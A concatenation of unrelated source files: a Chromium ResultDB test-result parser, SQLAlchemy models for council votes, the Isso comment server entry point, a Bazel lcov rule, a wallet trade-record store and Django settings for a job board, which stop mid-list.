classified_results[test_name].results.skips['SKIP'] = test_info[
"num_skipped"]
if test_info["num_notrun"]:
classified_results[test_name].results.notruns['SKIP'] = test_info[
"num_notrun"]
if test_info["num_unspecified"]:
classified_results[test_name].results.unknowns[
'UNSPECIFIED'] = test_info["num_unspecified"]
return classified_results
def GetTestLocation(self, test_name):
"""Gets test location for a specific test.
Returns: A tuple containing
* A dictionary of {
"line": line number of the test
"file": file path to the test
}
* A possible error string
"""
location = self.test_results.get(test_name, {}).get('test_location')
if not location:
return None, 'test location not found'
return location, None
def DoesTestExist(self, test_name):
return test_name in self.test_results
def IsTestResultUseful(self):
return len(self.test_results) > 0
@staticmethod
def group_test_results_by_test_name(test_results):
# pylint: disable=line-too-long
"""Returns a dictionary of
{
<test_name>:{
"reliable_failure": whether the test fail consistently
"failure_logs": array of dictionary {
"name": test result name (e.g. invocations/task-chromium-swarm.appspot.com-508dcba4306cae11/tests/ninja:%2F%2Fgpu:gl_tests%2FSharedImageGLBackingProduceDawnTest.Basic/results/c649f775-00777)
"summary_html": summary_html of a run
}
"test_type": type of test
"test_location": location of the test
"total_run": number of runs for the test
"num_expected_results": number of expected runs
"num_unexpected_results": number of unexpected runs
"num_passed": number of passed results
"num_failed": number of failed results
"num_crashed": number of crashed results
"num_aborted": number of aborted results
"num_skipped": number of skipped results
"num_notrun": number of not run results
"num_unspecified": number of unspecified results
}
}
Arguments:
test_results: Array of ResultDB TestResult object
"""
results = defaultdict(dict)
for test_result in test_results:
test_name = ResultDBTestResults.test_name_for_test_result(test_result)
if not test_name:
continue
is_failure = ResultDBTestResults.is_failure(test_result)
log = {
"name":
test_result.name,
"summary_html":
ResultDBTestResults.summary_html_for_test_result(test_result)
}
if not results.get(test_name):
results[test_name] = {
"reliable_failure":
is_failure,
"failure_logs": [log] if is_failure else [],
"test_type":
ResultDBTestResults.test_type_for_test_result(test_result),
"test_location":
ResultDBTestResults.test_location_for_test_result(test_result),
"total_run":
0,
"num_expected_results":
0,
"num_unexpected_results":
0,
"num_passed":
0,
"num_failed":
0,
"num_crashed":
0,
"num_aborted":
0,
"num_skipped":
0,
"num_notrun":
0,
"num_unspecified":
0,
}
else:
results[test_name]["reliable_failure"] = results[test_name][
"reliable_failure"] and is_failure
if is_failure:
results[test_name]["failure_logs"].append(log)
ResultDBTestResults._update_classified_test_results(
results[test_name], test_result)
return results
@staticmethod
def _update_classified_test_results(classified_results, test_result):
"""Update classified_results with a test result object
Arguments:
classified_results: A dictionary containing results for a test ID
test_result: A luci.resultdb.v1.TestResult object
"""
classified_results["total_run"] += 1
if test_result.expected:
classified_results["num_expected_results"] += 1
else:
classified_results["num_unexpected_results"] += 1
if test_result.status == test_result_pb2.TestStatus.PASS:
classified_results["num_passed"] += 1
elif test_result.status == test_result_pb2.TestStatus.FAIL:
classified_results["num_failed"] += 1
elif test_result.status == test_result_pb2.TestStatus.CRASH:
classified_results["num_crashed"] += 1
elif test_result.status == test_result_pb2.TestStatus.ABORT:
classified_results["num_aborted"] += 1
elif test_result.status == test_result_pb2.TestStatus.SKIP:
if test_result.expected:
classified_results["num_skipped"] += 1
else:
classified_results["num_notrun"] += 1
else:
classified_results["num_unspecified"] += 1
@staticmethod
def is_failure(test_result):
return test_result.status in _FAILURE_STATUSES and not test_result.expected
@staticmethod
def test_name_for_test_result(test_result):
"""Returns the test name for luci.resultdb.v1.TestResult object
Arguments:
test_result: A luci.resultdb.v1.TestResult object
"""
for tag in test_result.tags or []:
if tag.key == "test_name":
return tag.value
logging.warning("There is no test name for test_id: %s",
test_result.test_id)
return None
@staticmethod
def summary_html_for_test_result(test_result):
return test_result.summary_html or ""
@staticmethod
def test_type_for_test_result(test_result):
"""Return a ResultDBTestType for test_result"""
if "blink_web_tests" in test_result.test_id:
return ResultDBTestType.BLINK
if test_result.tags:
for tag in test_result.tags:
if "gtest" in tag.key:
return ResultDBTestType.GTEST
return ResultDBTestType.OTHER
@staticmethod
def test_location_for_test_result(test_result):
"""Return test location for test_result"""
if (not test_result.test_metadata or
not test_result.test_metadata.location or
not test_result.test_metadata.location.file_name):
return None
return {
"line": test_result.test_metadata.location.line,
"file": test_result.test_metadata.location.file_name
}
@staticmethod
def get_detailed_failure_log(test_type, failure_log):
"""Gets the detailed failure log from artifact if possible
For gtest, if there is stack_trace artifact, download the content of the
artifact. Otherwise, just return summaryHTML
Argument:
test_type: ResultDBTestType
failure_log: Dictionary of {"name":..., "summary_html":...}
Returns:
A string for the detailed failure logs
"""
summary_html = failure_log["summary_html"]
if test_type != ResultDBTestType.GTEST:
return summary_html
# We only check for "stack_trace" artifact if "stack_trace" presents in
# summary_html
if "stack_trace" not in summary_html:
return summary_html
test_result_name = failure_log["name"]
artifacts = resultdb.list_artifacts(test_result_name) or []
stack_trace_artifact = next(
(a for a in artifacts if a.artifact_id == "stack_trace"), None)
if not stack_trace_artifact:
return summary_html
fetch_url = stack_trace_artifact.fetch_url
content, error = http_client_util.SendRequestToServer(
fetch_url, _FINDIT_HTTP_CLIENT)
if not error:
return content
logging.warning("Unable to fetch content from %s: %s", fetch_url, error)
return summary_html
|
py | 1a3f61846c5ecfa4a855eb08fa250b19537e1f31 | from application import db
from sqlalchemy.orm import relationship
class Sessao(db.Model):
id = db.Column(db.Integer, primary_key=True)
nome = db.Column(db.Text)
data = db.Column(db.Date())
votacao = relationship("Votacao", back_populates="sessao")
class Partido(db.Model):
id = db.Column(db.Integer, primary_key=True)
nome = db.Column(db.Text)
vereador = db.relationship('Vereador', backref='partido', lazy='dynamic')
class Vereador(db.Model):
id = db.Column(db.Integer, primary_key=True)
nome = db.Column(db.Text)
idparlamentar = db.Column(db.Integer)
partido_id = db.Column(db.Integer, db.ForeignKey('partido.id'))
votos = relationship("Voto", back_populates="vereador")
class Votacao(db.Model):
id = db.Column(db.Integer, primary_key=True)
votacaoid = db.Column(db.Integer)
sessao_id = db.Column(db.Integer, db.ForeignKey('sessao.id'))
tipo = db.Column(db.Text)
materia = db.Column(db.Text)
ementa = db.Column(db.Text)
resultado = db.Column(db.Text)
presentes = db.Column(db.Integer)
sim = db.Column(db.Integer)
nao = db.Column(db.Integer)
abstencao = db.Column(db.Integer)
branco = db.Column(db.Integer)
notas_rodape = db.Column(db.Text)
votos = relationship("Voto", back_populates="votacao")
sessao = relationship("Sessao", back_populates="votacao")
class Voto(db.Model):
id = db.Column(db.Integer, primary_key=True)
votacao_id = db.Column(db.Integer, db.ForeignKey('votacao.id'))
vereador_id = db.Column(db.Integer, db.ForeignKey('vereador.id'))
valor = db.Column(db.Text)
vereador = relationship("Vereador", back_populates="votos")
votacao = relationship("Votacao", back_populates="votos")
|
py | 1a3f62fe49ddb034742bf023d9d2d51b1b5c1667 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# The MIT License (MIT)
#
# Copyright (c) 2012-2014 Martin Zimmermann.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# Isso – a lightweight Disqus alternative
from __future__ import print_function, unicode_literals
import pkg_resources
dist = pkg_resources.get_distribution("isso")
# check if exectuable is `isso` and gevent is available
import sys
if sys.argv[0].startswith("isso"):
try:
import gevent.monkey
gevent.monkey.patch_all()
except ImportError:
pass
import os
import errno
import logging
import tempfile
from os.path import dirname, join
from argparse import ArgumentParser
from functools import partial, reduce
import pkg_resources
werkzeug = pkg_resources.get_distribution("werkzeug")
from itsdangerous import URLSafeTimedSerializer
from werkzeug.routing import Map
from werkzeug.exceptions import HTTPException, InternalServerError
from werkzeug.middleware.shared_data import SharedDataMiddleware
from werkzeug.local import Local, LocalManager
from werkzeug.serving import run_simple
from werkzeug.middleware.proxy_fix import ProxyFix
from werkzeug.middleware.profiler import ProfilerMiddleware
local = Local()
local_manager = LocalManager([local])
from isso import config, db, db_psql, migrate, wsgi, ext, views
from isso.core import ThreadedMixin, ProcessMixin, uWSGIMixin
from isso.wsgi import origin, urlsplit
from isso.utils import http, JSONRequest, html, hash
from isso.views import comments
from isso.ext.notifications import Stdout, SMTP
logging.getLogger('werkzeug').setLevel(logging.WARN)
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(levelname)s: %(message)s")
logger = logging.getLogger("isso")
class ProxyFixCustom(ProxyFix):
def __init__(self, app):
# This is needed for werkzeug.wsgi.get_current_url called in isso/views/comments.py
# to work properly when isso is hosted under a sub-path
# cf. https://werkzeug.palletsprojects.com/en/1.0.x/middleware/proxy_fix/
super().__init__(app, x_prefix=1)
class Isso(object):
def __init__(self, conf):
self.conf = conf
db_type = conf.get('general', 'db-type')
if db_type == 'psql':
self.db = db_psql.PSQL(conf.get('general', 'dbpath'), conf)
else:
self.db = db.SQLite3(conf.get('general', 'dbpath'), conf)
self.signer = URLSafeTimedSerializer(
self.db.preferences.get("session-key"))
self.markup = html.Markup(conf.section('markup'))
self.hasher = hash.new(conf.section("hash"))
super(Isso, self).__init__(conf)
subscribers = []
smtp_backend = False
for backend in conf.getlist("general", "notify"):
if backend == "stdout":
subscribers.append(Stdout(None))
elif backend in ("smtp", "SMTP"):
smtp_backend = True
else:
logger.warn("unknown notification backend '%s'", backend)
if smtp_backend or conf.getboolean("general", "reply-notifications"):
subscribers.append(SMTP(self))
self.signal = ext.Signal(*subscribers)
self.urls = Map()
views.Info(self)
views.Metrics(self)
comments.API(self, self.hasher)
def render(self, text):
return self.markup.render(text)
def sign(self, obj):
return self.signer.dumps(obj)
def unsign(self, obj, max_age=None):
return self.signer.loads(obj, max_age=max_age or self.conf.getint('general', 'max-age'))
def dispatch(self, request):
local.request = request
local.host = wsgi.host(request.environ)
local.origin = origin(self.conf.getiter(
"general", "host"))(request.environ)
adapter = self.urls.bind_to_environ(request.environ)
try:
handler, values = adapter.match()
except HTTPException as e:
return e
else:
try:
response = handler(request.environ, request, **values)
except HTTPException as e:
return e
except Exception:
logger.exception("%s %s", request.method,
request.environ["PATH_INFO"])
return InternalServerError()
else:
return response
def wsgi_app(self, environ, start_response):
response = self.dispatch(JSONRequest(environ))
return response(environ, start_response)
def __call__(self, environ, start_response):
return self.wsgi_app(environ, start_response)
def make_app(conf=None, threading=True, multiprocessing=False, uwsgi=False):
if not any((threading, multiprocessing, uwsgi)):
raise RuntimeError("either set threading, multiprocessing or uwsgi")
if threading:
class App(Isso, ThreadedMixin):
pass
elif multiprocessing:
class App(Isso, ProcessMixin):
pass
else:
class App(Isso, uWSGIMixin):
pass
isso = App(conf)
# check HTTP server connection
for host in conf.getiter("general", "host"):
with http.curl('HEAD', host, '/', 5) as resp:
if resp is not None:
logger.info("connected to %s", host)
break
else:
logger.warn("unable to connect to your website, Isso will probably not "
"work correctly. Please make sure, Isso can reach your "
"website via HTTP(S).")
wrapper = [local_manager.make_middleware]
if isso.conf.getboolean("server", "profile"):
wrapper.append(partial(ProfilerMiddleware,
sort_by=("cumulative", ), restrictions=("isso/(?!lib)", 10)))
wrapper.append(partial(SharedDataMiddleware, exports={
'/js': join(dirname(__file__), 'js/'),
'/css': join(dirname(__file__), 'css/'),
'/img': join(dirname(__file__), 'img/'),
'/demo': join(dirname(__file__), 'demo/')
}))
wrapper.append(partial(wsgi.CORSMiddleware,
origin=origin(isso.conf.getiter("general", "host")),
allowed=("Origin", "Referer", "Content-Type"),
exposed=("X-Set-Cookie", "Date")))
wrapper.extend([wsgi.SubURI, ProxyFixCustom])
if werkzeug.version.startswith("0.8"):
wrapper.append(wsgi.LegacyWerkzeugMiddleware)
return reduce(lambda x, f: f(x), wrapper, isso)
def main():
parser = ArgumentParser(description="a blog comment hosting service")
subparser = parser.add_subparsers(help="commands", dest="command")
parser.add_argument('--version', action='version',
version='%(prog)s ' + dist.version)
parser.add_argument("-c", dest="conf", default="/etc/isso.conf",
metavar="/etc/isso.conf", help="set configuration file")
imprt = subparser.add_parser('import', help="import Disqus XML export")
imprt.add_argument("dump", metavar="FILE")
imprt.add_argument("-n", "--dry-run", dest="dryrun", action="store_true",
help="perform a trial run with no changes made")
imprt.add_argument("-t", "--type", dest="type", default=None,
choices=["disqus", "wordpress", "generic"], help="export type")
imprt.add_argument("--empty-id", dest="empty_id", action="store_true",
help="workaround for weird Disqus XML exports, #135")
# run Isso as stand-alone server
subparser.add_parser("run", help="run server")
args = parser.parse_args()
conf = config.load(
join(dist.location, dist.project_name, "defaults.ini"), args.conf)
if args.command == "import":
conf.set("guard", "enabled", "off")
if args.dryrun:
xxx = tempfile.NamedTemporaryFile()
dbpath = xxx.name
else:
dbpath = conf.get("general", "dbpath")
mydb = db.SQLite3(dbpath, conf)
migrate.dispatch(args.type, mydb, args.dump, args.empty_id)
sys.exit(0)
if conf.get("general", "log-file"):
handler = logging.FileHandler(conf.get("general", "log-file"))
logger.addHandler(handler)
logging.getLogger("werkzeug").addHandler(handler)
logger.propagate = False
logging.getLogger("werkzeug").propagate = False
if not any(conf.getiter("general", "host")):
logger.error("No website(s) configured, Isso won't work.")
sys.exit(1)
if conf.get("server", "listen").startswith("http://"):
host, port, _ = urlsplit(conf.get("server", "listen"))
try:
from gevent.pywsgi import WSGIServer
WSGIServer((host, port), make_app(conf)).serve_forever()
except ImportError:
run_simple(host, port, make_app(conf), threaded=True,
use_reloader=conf.getboolean('server', 'reload'))
else:
sock = conf.get("server", "listen").partition("unix://")[2]
try:
os.unlink(sock)
except OSError as ex:
if ex.errno != errno.ENOENT:
raise
wsgi.SocketHTTPServer(sock, make_app(conf)).serve_forever()
|
bzl | 1a3f6447fd07a61a7fdbdda11bdda877726aea44 | # Copyright 2018 The Bazel Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Coverage report generation."""
load("@bazel_tools//tools/build_defs/repo:git.bzl", "new_git_repository")
_LCOV_BUILD_FILE_CONTENT = """
filegroup(
name = "bin",
srcs = glob(["bin/**/*"]),
visibility = ["//visibility:public"],
)
"""
def bazel_coverage_report_repositories():
"""Add to the WORKSPACE external dependencies needed by the generator.
"""
if "lcov" not in native.existing_rules():
new_git_repository(
name = "lcov",
build_file_content = _LCOV_BUILD_FILE_CONTENT,
commit = "a5dd9529f9232b8d901a4d6eb9ae54cae179e5b3",
remote = "https://github.com/linux-test-project/lcov.git",
)
|
py | 1a3f64c5ed1306924043598969eeed5c125fa7aa | from typing import List, Optional
import aiosqlite
from aloe.types.blockchain_format.sized_bytes import bytes32
from aloe.types.mempool_inclusion_status import MempoolInclusionStatus
from aloe.util.db_wrapper import DBWrapper
from aloe.util.errors import Err
from aloe.util.ints import uint8, uint32
from aloe.wallet.trade_record import TradeRecord
from aloe.wallet.trading.trade_status import TradeStatus
class TradeStore:
"""
TradeStore stores trading history.
"""
db_connection: aiosqlite.Connection
cache_size: uint32
db_wrapper: DBWrapper
@classmethod
async def create(cls, db_wrapper: DBWrapper, cache_size: uint32 = uint32(600000)):
self = cls()
self.cache_size = cache_size
self.db_wrapper = db_wrapper
self.db_connection = db_wrapper.db
await self.db_connection.execute("pragma journal_mode=wal")
await self.db_connection.execute("pragma synchronous=2")
await self.db_connection.execute(
(
"CREATE TABLE IF NOT EXISTS trade_records("
" trade_record blob,"
" trade_id text PRIMARY KEY,"
" status int,"
" confirmed_at_index int,"
" created_at_time bigint,"
" sent int)"
)
)
await self.db_connection.execute(
"CREATE INDEX IF NOT EXISTS trade_confirmed_index on trade_records(confirmed_at_index)"
)
await self.db_connection.execute("CREATE INDEX IF NOT EXISTS trade_status on trade_records(status)")
await self.db_connection.execute("CREATE INDEX IF NOT EXISTS trade_id on trade_records(trade_id)")
await self.db_connection.commit()
return self
async def _clear_database(self):
cursor = await self.db_connection.execute("DELETE FROM trade_records")
await cursor.close()
await self.db_connection.commit()
async def add_trade_record(self, record: TradeRecord, in_transaction) -> None:
"""
Store TradeRecord into DB
"""
if not in_transaction:
await self.db_wrapper.lock.acquire()
try:
cursor = await self.db_connection.execute(
"INSERT OR REPLACE INTO trade_records VALUES(?, ?, ?, ?, ?, ?)",
(
bytes(record),
record.trade_id.hex(),
record.status,
record.confirmed_at_index,
record.created_at_time,
record.sent,
),
)
await cursor.close()
finally:
if not in_transaction:
await self.db_connection.commit()
self.db_wrapper.lock.release()
async def set_status(self, trade_id: bytes32, status: TradeStatus, in_transaction: bool, index: uint32 = uint32(0)):
"""
Updates the status of the trade
"""
current: Optional[TradeRecord] = await self.get_trade_record(trade_id)
if current is None:
return None
confirmed_at_index = current.confirmed_at_index
if index != 0:
confirmed_at_index = index
tx: TradeRecord = TradeRecord(
confirmed_at_index=confirmed_at_index,
accepted_at_time=current.accepted_at_time,
created_at_time=current.created_at_time,
my_offer=current.my_offer,
sent=current.sent,
spend_bundle=current.spend_bundle,
tx_spend_bundle=current.tx_spend_bundle,
additions=current.additions,
removals=current.removals,
trade_id=current.trade_id,
status=uint32(status.value),
sent_to=current.sent_to,
)
await self.add_trade_record(tx, in_transaction)
async def increment_sent(
self,
id: bytes32,
name: str,
send_status: MempoolInclusionStatus,
err: Optional[Err],
) -> bool:
"""
Updates trade sent count (Full Node has received spend_bundle and sent ack).
"""
current: Optional[TradeRecord] = await self.get_trade_record(id)
if current is None:
return False
sent_to = current.sent_to.copy()
err_str = err.name if err is not None else None
append_data = (name, uint8(send_status.value), err_str)
# Don't increment count if it's already sent to this peer
if append_data in sent_to:
return False
sent_to.append(append_data)
tx: TradeRecord = TradeRecord(
confirmed_at_index=current.confirmed_at_index,
accepted_at_time=current.accepted_at_time,
created_at_time=current.created_at_time,
my_offer=current.my_offer,
sent=uint32(current.sent + 1),
spend_bundle=current.spend_bundle,
tx_spend_bundle=current.tx_spend_bundle,
additions=current.additions,
removals=current.removals,
trade_id=current.trade_id,
status=current.status,
sent_to=sent_to,
)
await self.add_trade_record(tx, False)
return True
async def set_not_sent(self, id: bytes32):
"""
Updates trade sent count to 0.
"""
current: Optional[TradeRecord] = await self.get_trade_record(id)
if current is None:
return None
tx: TradeRecord = TradeRecord(
confirmed_at_index=current.confirmed_at_index,
accepted_at_time=current.accepted_at_time,
created_at_time=current.created_at_time,
my_offer=current.my_offer,
sent=uint32(0),
spend_bundle=current.spend_bundle,
tx_spend_bundle=current.tx_spend_bundle,
additions=current.additions,
removals=current.removals,
trade_id=current.trade_id,
status=uint32(TradeStatus.PENDING_CONFIRM.value),
sent_to=[],
)
await self.add_trade_record(tx, False)
async def get_trade_record(self, trade_id: bytes32) -> Optional[TradeRecord]:
"""
Checks DB for TradeRecord with id: id and returns it.
"""
cursor = await self.db_connection.execute("SELECT * from trade_records WHERE trade_id=?", (trade_id.hex(),))
row = await cursor.fetchone()
await cursor.close()
if row is not None:
record = TradeRecord.from_bytes(row[0])
return record
return None
async def get_trade_record_with_status(self, status: TradeStatus) -> List[TradeRecord]:
"""
Checks DB for TradeRecord with id: id and returns it.
"""
cursor = await self.db_connection.execute("SELECT * from trade_records WHERE status=?", (status.value,))
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def get_not_sent(self) -> List[TradeRecord]:
"""
Returns the list of trades that have not been received by full node yet.
"""
cursor = await self.db_connection.execute(
"SELECT * from trade_records WHERE sent<? and confirmed=?",
(
4,
0,
),
)
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def get_all_unconfirmed(self) -> List[TradeRecord]:
"""
Returns the list of all trades that have not yet been confirmed.
"""
cursor = await self.db_connection.execute("SELECT * from trade_records WHERE confirmed=?", (0,))
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def get_all_trades(self) -> List[TradeRecord]:
"""
Returns all stored trades.
"""
cursor = await self.db_connection.execute("SELECT * from trade_records")
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def get_trades_above(self, height: uint32) -> List[TradeRecord]:
cursor = await self.db_connection.execute("SELECT * from trade_records WHERE confirmed_at_index>?", (height,))
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def rollback_to_block(self, block_index):
# Delete from storage
cursor = await self.db_connection.execute(
"DELETE FROM trade_records WHERE confirmed_at_index>?", (block_index,)
)
await cursor.close()
await self.db_connection.commit()
|
py | 1a3f651a8c20a94cdcb9fc51031483fe76973d5a | """
Django settings for pyjobs project.
Generated by 'django-admin startproject' using Django 1.11.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
from decouple import config
from dj_database_url import parse as db_url
from django.utils.translation import gettext_lazy as _
from unipath import Path
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
BASE_DIR_PARENT = Path(__file__).parent
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config("SECRET_KEY")
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config("DEBUG", default=False, cast=bool)
ALLOWED_HOSTS = ["*"]
# E-mail
DEFAULT_FROM_EMAIL = config("DEFAULT_FROM_EMAIL", default="[email protected]")
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
"django.contrib.humanize",
"django.contrib.sites",
"django_extensions",
"django.contrib.redirects",
"pyjobs.core",
"pyjobs.api",
"pyjobs.marketing",
"pyjobs.partners",
"pyjobs.profiler",
"pyjobs.synchronizer",
"pyjobs.assessment",
"widget_tweaks",
"social_django",
"django_select2",
"django.contrib.sitemaps",
"raven.contrib.django.raven_compat",
"webpush",
]
MIDDLEWARE = [
"pyjobs.middleware.RedirectFallbackMiddleware",
"django.middleware.security.SecurityMiddleware",
"django.middleware.locale.LocaleMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"whitenoise.middleware.WhiteNoiseMiddleware",
"social_django.middleware.SocialAuthExceptionMiddleware",
]
ROOT_URLCONF = "pyjobs.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [BASE_DIR + "/templates"],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
"pyjobs.core.context_processors.global_vars",
"social_django.context_processors.backends",
"social_django.context_processors.login_redirect",
]
},
},
]
WSGI_APPLICATION = "pyjobs.wsgi.application"
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
"default": config(
"DATABASE_URL",
default="sqlite:///" + BASE_DIR_PARENT.child("db.sqlite3"),
cast=db_url,
)
}
THUMBNAILS_BASE_FOLDER = "%s/pyjobs/core/thumb/" % (BASE_DIR)
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator"
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = "pt"
TIME_ZONE = "America/Sao_Paulo"
USE_I18N = True
USE_L10N = True
USE_TZ = False
LOCALE_PATHS = [os.path.join(PROJECT_ROOT, "translations")]
LANGUAGES = [
("pt", _("Portuguese")),
("en", _("English")),
]
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = "/static/"
STATIC_ROOT = os.path.join(PROJECT_ROOT, "static")
STATICFILES_FINDERS = [
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
]
STATICFILES_DIRS = (os.path.join(PROJECT_ROOT, "staticfiles"),)
RAVEN_CONFIG = {"dsn": config("SENTRY_DSN", default=None)}
LOGIN_REDIRECT_URL = "/"
LOGIN_URL = "/login"
LOGOUT_REDIRECT_URL = "/"
EMAIL_BACKEND = config(
"EMAIL_BACKEND", default="django.core.mail.backends.console.EmailBackend"
)
SENDGRID_API_KEY = config("SENDGRID_API_KEY", default=None)
GA_CODE = config("GA_CODE", default="")
# MailChimp
MAILCHIMP_API_KEY = config("MAILCHIMP_API_KEY", default=None)
MAILCHIMP_USERNAME = config("MAILCHIMP_USERNAME", default=None)
MAILCHIMP_LIST_KEY = config("MAILCHIMP_LIST_KEY", default=None)
# Telegram
TELEGRAM_TOKEN = config("TELEGRAM_TOKEN", default=None)
TELEGRAM_CHATID = config("TELEGRAM_CHATID", default=None)
# Recaptcha
RECAPTCHA_SECRET_KEY = config("RECAPTCHA_SECRET_KEY", default=None)
# Force SSL
if "DYNO" in os.environ: # pragma: no cover
SECURE_SSL_REDIRECT = config("SECURE_SSL_REDIRECT", default=False)
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
WEBSITE_NAME = config("WEBSITE_NAME", default=None)
WEBSITE_SLOGAN = config("WEBSITE_SLOGAN", default=None)
WEBSITE_URL = config("WEBSITE_URL", default=None)
WEBSITE_OWNER_EMAIL = config("WEBSITE_OWNER_EMAIL", default=None)
WEBSITE_OWNER_CELLPHONE = config("WEBSITE_OWNER_CELLPHONE", default=None)
WEBSITE_GENERAL_EMAIL = config("WEBSITE_GENERAL_EMAIL", default=None)
WEBSITE_WORKING_LANGUAGE = config("WEBSITE_WORKING_LANGUAGE", default=None)
WEBSITE_MAILINGLIST_LINK = config("WEBSITE_MAILINGLIST_LINK", default=None)
WEBSITE_OWNER_NAME = config("WEBSITE_OWNER_NAME", default=None)
USER_SUBSTANTIVE = config("USER_SUBSTANTIVE", default=None)
WEBSITE_HOME_URL = config("WEBSITE_HOME_URL", default=None)
MAILERLITE_API_KEY = config("MAILERLITE_API_KEY", default=None)
GITHUB_ACCESS_TOKEN = config("GITHUB_ACCESS_TOKEN", default=None)
GITHUB_ISSUES_LABELS = config("GITHUB_ISSUES_LABELS", default=None)
GITHUB_DEFAULT_REPO = config("GITHUB_DEFAULT_REPO", default=None)
WEBSITE_MANAGERS_GITHUB_NICKNAME = config(
"WEBSITE_MANAGERS_GITHUB_NICKNAME", default=None
)
WEBPUSH_SETTINGS = {
"VAPID_PUBLIC_KEY": config("VAPID_PUBLIC_KEY", default=None),
"VAPID_PRIVATE_KEY": config("VAPID_PRIVATE_KEY", default=None),
"VAPID_ADMIN_EMAIL": config("VAPID_ADMIN_EMAIL", default=None),
}
STATE_CHOICES = [
(0, _("Acre")),
(1, _("Alagoas")),
(2, _("Amapá")),
(3, _("Amazonas")),
(4, _("Bahia")),
(5, _("Ceará")),
(6, _("Distrito Federal")),
(7, _("Espírito Santo")),
(8, _("Goiás")),
(9, _("Maranhão")),
(10, _("Mato Grosso")),
(11, _("Mato Grosso do Sul")),
(12, _("Minas Gerais")),
(13, _("Pará")),
(14, _("Paraíba")),
(15, _("Paraná")),
(16, _("Pernambuco")),
(17, _("Piauí")),
(18, _("Rio de Janeiro")),
(19, _("Rio Grande do Norte")),
(20, _("Rio Grande do Sul")),
(21, _("Rondônia")),
(22, _("Roraima")),
(23, _("Santa Catarina")),
(24, _("São Paulo")),
(25, _("Sergipe")),
(26, _("Tocantins")),
(27, _("Indeterminado")),
]
SALARY_RANGES = [
(1, "0,00 - 1.000,00"),
(2, "1.000,01 - 3.000,00"),
(3, "3.000,01 - 6.000,00"),
(4, "6.000,01 - 10.000,00"),
(5, "10.000,01 - 13.000,00"),
(6, "13.000,01 - 16.000,00"),
(7, "16.000,01 - 19.000,00"),
(8, "19.000,01 - 21.000,00"),
(9, "21.000,01 - +"),
(10, _("NI")),
]
JOB_LEVELS = [
(1, _("Estágio")),
(2, _("Junior")),
(3, _("Pleno")),
(4, _("Sênior")),
(5, _("Indeterminado")),
]
CONTRACT = [
